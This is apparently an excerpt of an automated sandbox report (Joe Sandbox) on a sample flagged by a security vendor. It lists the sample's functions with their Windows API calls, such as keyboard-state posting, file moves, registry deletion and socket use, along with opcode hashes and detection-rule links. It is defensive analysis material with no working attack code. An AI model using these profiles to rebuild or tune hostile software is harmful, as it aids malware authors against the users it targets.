Opcode Fuzzy Hash: 3bb3d66584e8c08c263a6d022a3dd01913ce3555e85a5185d962fb3419918a81
Instruction Fuzzy Hash: 9B018FF290424CBFE720A7A0DD99EE7776CE708700F0004A6BB45D6051EA349E858B71

Uniqueness

Uniqueness Score: -1.00%

Function 009ED74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00962612: GetWindowLongW.USER32(?,000000EB), ref: 00962623

GetSystemMetrics.USER32(0000000F), ref: 009ED78A
GetSystemMetrics.USER32(0000000F), ref: 009ED7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 009ED9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009EDA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009EDA24
ShowWindow.USER32(00000003,00000000), ref: 009EDA43
InvalidateRect.USER32(?,00000000,00000001), ref: 009EDA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 009EDA8B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 340d0c13bfa8aeb0b5be5310ade166ba5aa66b6a59a5f17d3c826c614b135c91
Instruction ID: cb9e9aa3a318c909cb155600dc76411a663b2b2b96d25cbde94cb0a20f91ca3a
Opcode Fuzzy Hash: 340d0c13bfa8aeb0b5be5310ade166ba5aa66b6a59a5f17d3c826c614b135c91
Instruction Fuzzy Hash: A3B198716012A5EBDF15CF6AC9C57BD7BB5BF04701F088079EC489A295D734AE50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00962A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0099C417,00000004,00000000,00000000,00000000), ref: 00962ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0099C417,00000004,00000000,00000000,00000000,000000FF), ref: 00962B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0099C417,00000004,00000000,00000000,00000000), ref: 0099C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0099C417,00000004,00000000,00000000,00000000), ref: 0099C4D6

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 73c7306b28243f77f838376db60a63f296c099808245775bf6d72e46bba4af02
Instruction ID: 53b21f3fcbc322933ffc994b1a99c90961cd9eb22cdb0e15279f38735f83ec49
Opcode Fuzzy Hash: 73c7306b28243f77f838376db60a63f296c099808245775bf6d72e46bba4af02
Instruction Fuzzy Hash: FD410E30718BC09ACB358BBC9CDC77A7B9AAB86300F548C1DE0874A5F1C6B59C41E710

Uniqueness

Uniqueness Score: -1.00%

Function 009C7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 009C737F

Part of subcall function 00980FF6: std::exception::exception.LIBCMT ref: 0098102C
Part of subcall function 00980FF6: __CxxThrowException@8.LIBCMT ref: 00981041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009C73B6
EnterCriticalSection.KERNEL32(?), ref: 009C73D2
_memmove.LIBCMT ref: 009C7420
_memmove.LIBCMT ref: 009C743D
LeaveCriticalSection.KERNEL32(?), ref: 009C744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009C7461
InterlockedExchange.KERNEL32(?,000001F6), ref: 009C7480

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 23cacdf944f2772643673ce5adf132287ea058bf46dd0a4d1c3fcb590f03d4bc
Instruction ID: c9e2d51e1b7a5d0ec3afbe7ff6a0f737bfd8c0adf15ae9187e32743cb9e6280f
Opcode Fuzzy Hash: 23cacdf944f2772643673ce5adf132287ea058bf46dd0a4d1c3fcb590f03d4bc
Instruction Fuzzy Hash: DD316131904245EBCF10EF94DD85EAEBB78EF84710B1481AAF9049B256DB309E15DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009E6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 009E645A
GetDC.USER32(00000000), ref: 009E6462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009E646D
ReleaseDC.USER32(00000000,00000000), ref: 009E6479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009E64B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009E64C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009E9299,?,?,000000FF,00000000,?,000000FF,?), ref: 009E6500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009E6520

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 463fe5f31975b827863effa5260001dd0708175aa0861bd1c11dadbfd953148e
Instruction ID: 9e1158efba7c7804c01a42ea8dde70ae1adbd278ed0a68b80d9ca03e864c88f3
Opcode Fuzzy Hash: 463fe5f31975b827863effa5260001dd0708175aa0861bd1c11dadbfd953148e
Instruction Fuzzy Hash: FB317A72214294BFEB118F51CC8AFAA3FADEB19765F044066FE089E2A1D6759C41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009BC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 009BC087
_memcmp.LIBCMT ref: 009BC0A9
_memcmp.LIBCMT ref: 009BC0C1
_memcmp.LIBCMT ref: 009BC0D4
_memcmp.LIBCMT ref: 009BC0EE
_memcmp.LIBCMT ref: 009BC101
_memcmp.LIBCMT ref: 009BC119
_memcmp.LIBCMT ref: 009BC134

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e31492ef44f6c20c816cb34adfd289be4107ffeef67392e8ca15f7bc23cb19b1
Instruction ID: ad643fcc4dc5734c6d9ea40f1d783dffa319191c059bfa484177e4b3c4b78107
Opcode Fuzzy Hash: e31492ef44f6c20c816cb34adfd289be4107ffeef67392e8ca15f7bc23cb19b1
Instruction Fuzzy Hash: 912187F1745209B7DA14B6259E46FFF339CAF903B8B044021FE4596382F756DD1283A5

Uniqueness

Uniqueness Score: -1.00%

Function 009CED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00969997: __itow.LIBCMT ref: 009699C2
Part of subcall function 00969997: __swprintf.LIBCMT ref: 00969A0C

Part of subcall function 0097FEC6: _wcscpy.LIBCMT ref: 0097FEE9

_wcstok.LIBCMT ref: 009CEEFF
_wcscpy.LIBCMT ref: 009CEF8E
_memset.LIBCMT ref: 009CEFC1

Strings

X, xrefs: 009CEFFE

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 95a8614dce1cb74a24f07508890d102cd68bc1ad88518c2435d17a48a6014433
Instruction ID: f3c80d879a263c1ede840ec5c484c41406c876e6208ddecb4399f689329f892f
Opcode Fuzzy Hash: 95a8614dce1cb74a24f07508890d102cd68bc1ad88518c2435d17a48a6014433
Instruction Fuzzy Hash: 7DC149719083419FC724EF64C891F5AB7E9AF85314F04492DF89A9B2A2DB30ED45CB83

Uniqueness

Uniqueness Score: -1.00%

Function 009D6E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 009D6F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009D6F35
WSAGetLastError.WSOCK32(00000000), ref: 009D6F48
htons.WSOCK32(?,?,?,00000000,?), ref: 009D6FFE
inet_ntoa.WSOCK32(?), ref: 009D6FBB

Part of subcall function 009BAE14: _strlen.LIBCMT ref: 009BAE1E
Part of subcall function 009BAE14: _memmove.LIBCMT ref: 009BAE40

_strlen.LIBCMT ref: 009D7058
_memmove.LIBCMT ref: 009D70C1

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 9fa2fca23e110661731af0243b16981a119b6eb7bdc823864b3c9b8468980427
Instruction ID: ffb59311cd6d6b6d4ecbe504bc1679889eb1916a5f390e6db81239562eacbca4
Opcode Fuzzy Hash: 9fa2fca23e110661731af0243b16981a119b6eb7bdc823864b3c9b8468980427
Instruction Fuzzy Hash: 3881CF31548300ABD710EF64CC95F6BB3ADAFC4714F14891EF5569B2E2DA71AD04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00961424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e22d854be8a9de3b8afb459f00fa386d93b9a8f5f052b3e2350f48dea89fca
Instruction ID: 0e9a619f3ca7549fd2704986fe89e84213e37ae08e92f0e0eb6e382a7fb40ed4
Opcode Fuzzy Hash: 52e22d854be8a9de3b8afb459f00fa386d93b9a8f5f052b3e2350f48dea89fca
Instruction Fuzzy Hash: 4A715A31904109EFCF04CF98CC89ABEBB79FF85314F188159F916AB261C734AA51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009EB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01634AA0), ref: 009EB6A5
IsWindowEnabled.USER32(01634AA0), ref: 009EB6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 009EB795
SendMessageW.USER32(01634AA0,000000B0,?,?), ref: 009EB7CC
IsDlgButtonChecked.USER32(?,?), ref: 009EB809
GetWindowLongW.USER32(01634AA0,000000EC), ref: 009EB82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009EB843

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 9abcbd13b2f6267f7e3b0e21041b11485b07cf3b09d48b6f134d32f7d6ae48c1
Instruction ID: 25d37013d8c861e29bc79259f8e6daf5b657e7113fc22b8de1a272a43341773e
Opcode Fuzzy Hash: 9abcbd13b2f6267f7e3b0e21041b11485b07cf3b09d48b6f134d32f7d6ae48c1
Instruction Fuzzy Hash: B171DC34605284AFDB229F66C8E4FBB7BB9FF89710F040469E945976A1C732AD41CB10

Uniqueness

Uniqueness Score: -1.00%

Function 009DF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009DF75C
_memset.LIBCMT ref: 009DF825
ShellExecuteExW.SHELL32(?), ref: 009DF86A

Part of subcall function 00969997: __itow.LIBCMT ref: 009699C2
Part of subcall function 00969997: __swprintf.LIBCMT ref: 00969A0C

Part of subcall function 0097FEC6: _wcscpy.LIBCMT ref: 0097FEE9

GetProcessId.KERNEL32(00000000), ref: 009DF8E1
CloseHandle.KERNEL32(00000000), ref: 009DF910

Strings

@, xrefs: 009DF839

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: eb7511f6b435ad06554ad4bb8745226b3f712432f5a0a4599cf4de646a66d78b
Instruction ID: 246311f7af5d632d93a992491b09319d0a17eb0bfdd7293950c8a83600a1537d
Opcode Fuzzy Hash: eb7511f6b435ad06554ad4bb8745226b3f712432f5a0a4599cf4de646a66d78b
Instruction Fuzzy Hash: B7616075A00619DFCF14EF54C591AAEBBF9FF88310F14846AE85AAB351CB30AD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009C145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 009C149C
GetKeyboardState.USER32(?), ref: 009C14B1
SetKeyboardState.USER32(?), ref: 009C1512
PostMessageW.USER32(?,00000101,00000010,?), ref: 009C1540
PostMessageW.USER32(?,00000101,00000011,?), ref: 009C155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 009C15A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 009C15C8

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7ca20a1fa0f6f7da136a7fd19306625bbd25c5c6d60879dafc27ba31273a353e
Instruction ID: a5a2f933b0b230e09cd9fcd9df3c629377f3915013bc57ed1e92187f053f1872
Opcode Fuzzy Hash: 7ca20a1fa0f6f7da136a7fd19306625bbd25c5c6d60879dafc27ba31273a353e
Instruction Fuzzy Hash: 2251C1A0E087D53EFB3646248C55FBABEAD6B47304F08848DF1D5598D3C298DC84D76A

Uniqueness

Uniqueness Score: -1.00%

Function 009C1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 009C12B5
GetKeyboardState.USER32(?), ref: 009C12CA
SetKeyboardState.USER32(?), ref: 009C132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009C1357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009C1374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009C13B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009C13D9

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a480699e8746d8a80b54b48dee4c760134cdd47b84fa61887c91ab95cee50b95
Instruction ID: 9c7eff26b80d99bc97d36616d5498d5d8cecbf0858fee60393b2f33673307aa6
Opcode Fuzzy Hash: a480699e8746d8a80b54b48dee4c760134cdd47b84fa61887c91ab95cee50b95
Instruction Fuzzy Hash: 1E51D1A0D086D53DFB3682248C55FBABFAD6B07304F08858DE1D44A8D3D394AC94E76A

Uniqueness

Uniqueness Score: -1.00%

Function 009C589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 009C58AC
_wcsncpy.LIBCMT ref: 009C58E1
_wcsncpy.LIBCMT ref: 009C5913
_wcsncpy.LIBCMT ref: 009C5946
_wcsncpy.LIBCMT ref: 009C5988
_wcsncpy.LIBCMT ref: 009C59C2
_wcsncpy.LIBCMT ref: 009C59F1

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: c167c7b4ea4e192f5cf83a866f49cb585d3393a15c64e00a4aff5bd1c306a7a4
Instruction ID: 02ef13003253d1750d5ec80ff165f43c1dae2df0d4cdb3111359c79d6710362e
Opcode Fuzzy Hash: c167c7b4ea4e192f5cf83a866f49cb585d3393a15c64e00a4aff5bd1c306a7a4
Instruction Fuzzy Hash: 3D418465C20519B6CB10FBB4888ABCF73B89F44710F518566F918E3222E734E755C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 009C38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009C48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C38D3,?), ref: 009C48C7

Part of subcall function 009C48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009C38D3,?), ref: 009C48E0

lstrcmpiW.KERNEL32(?,?), ref: 009C38F3
_wcscmp.LIBCMT ref: 009C390F
MoveFileW.KERNEL32(?,?), ref: 009C3927
_wcscat.LIBCMT ref: 009C396F
SHFileOperationW.SHELL32(?), ref: 009C39DB

Strings

\*.*, xrefs: 009C3969

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: de8c36c4138915d9a73d4ae7a11025c929b236b5bc0a0e14eb03ae2702839716
Instruction ID: 524e6c63945a18af23802f73c9aa5c753e8b1edfcb14d06c8db60172c7804ec1
Opcode Fuzzy Hash: de8c36c4138915d9a73d4ae7a11025c929b236b5bc0a0e14eb03ae2702839716
Instruction Fuzzy Hash: A5415EB19083849AC751EF64C495FEFB7ECAF88380F10892EB499C7161EA74D688C753

Uniqueness

Uniqueness Score: -1.00%

Function 009E7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E7519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E75C0
IsMenu.USER32(?), ref: 009E75D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009E7620
DrawMenuBar.USER32 ref: 009E7633

Strings

0, xrefs: 009E750D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: cd62a3b00b43046259b6e3542192a70f8b72f4c69093d5d01991bd7386b110af
Instruction ID: 6d7f63f763a59762137a926dfb94d87e0288c515bb5849c5beb0d7542fad360f
Opcode Fuzzy Hash: cd62a3b00b43046259b6e3542192a70f8b72f4c69093d5d01991bd7386b110af
Instruction Fuzzy Hash: BC417C70A05688EFDB21DF95D884EAABBF8FF44314F048029F9159B251DB30AD00DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 009E122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 009E125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E1286
FreeLibrary.KERNEL32(00000000), ref: 009E133D

Part of subcall function 009E122D: RegCloseKey.ADVAPI32(?), ref: 009E12A3
Part of subcall function 009E122D: FreeLibrary.KERNEL32(?), ref: 009E12F5
Part of subcall function 009E122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 009E1318

RegDeleteKeyW.ADVAPI32(?,?), ref: 009E12E0

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
